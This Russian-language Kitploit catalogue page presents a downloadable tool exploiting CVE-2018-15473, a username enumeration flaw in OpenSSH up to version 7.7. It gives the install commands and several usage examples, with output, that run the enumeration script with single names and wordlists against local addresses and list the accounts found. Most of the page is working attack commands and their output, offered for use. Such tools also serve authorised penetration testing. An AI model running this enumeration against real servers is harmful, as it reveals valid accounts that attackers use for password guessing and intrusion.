Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2018-15473 | Kitploit
Инструменты/GitHubGitHub/wh1t3fox/cve-2018-15473
РазведкаАнализ уязвимостейЭксплуатацияСбор информацииСетевая безопасностьТестирование на Проникновение
GitHubwh1t3fox/cve-2018-15473

cve-2018-15473

Репозиторий
5 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-15473

OpenSSH до версии 7.7 включительно подвержен уязвимости перечисления пользователей из-за отсутствия задержки выхода (bailout) для недействительного аутентифицирующегося пользователя до полного разбора пакета, содержащего запрос; проблема связана с auth2-gss.c, auth2-hostbased.c и auth2-pubkey.c.

Установка

Возможно, вам потребуется установить эквивалент пакета openssl-dev из вашего дистрибутива

root@kitploit:~
# ПРИМЕЧАНИЕ: если вы устанавливаете на kali, можете пропустить pip install; paramiko там уже есть.  

git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt 
# - ИЛИ - 
pipenv install -r requirements.txt  # если вы такой крутой   
chmod u+x ssh-username-enum.py

Примеры

Одно имя пользователя

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!

Использование словаря с 10 потоками (по умолчанию 4)

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------

IPv6-адрес на порту 2222 и ПОВЫШЕННАЯ ПОДРОБНОСТЬ ВЫВОДА!

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------
Скачать инструмент